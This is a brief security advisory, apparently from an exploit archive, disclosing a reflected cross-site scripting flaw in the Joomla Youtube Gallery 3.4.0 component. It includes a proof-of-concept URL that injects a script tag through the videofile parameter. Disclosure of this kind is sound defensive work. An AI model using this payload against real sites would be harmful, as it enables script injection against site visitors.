Joomla Youtube Gallery 3.4.0 Cross Site Scripting

2014-03-16
ID: 78115
CVE: None
Download vulnerable application: None
Hello,

Cross-site
scripting (XSS) vulnerability in the Youtube Gallery 3.4.0 component for Joomla! allows remote attackers to inject arbitrary web
script or HTML via the videofile parameter to /includes/flvthumbnail.php.

POC:
http://SiteAddress/joomla/components/com_youtubegallery/includes/flvthumbnail.php?videofile=<script>alert('XSS')</script>
1-4-2 (www02)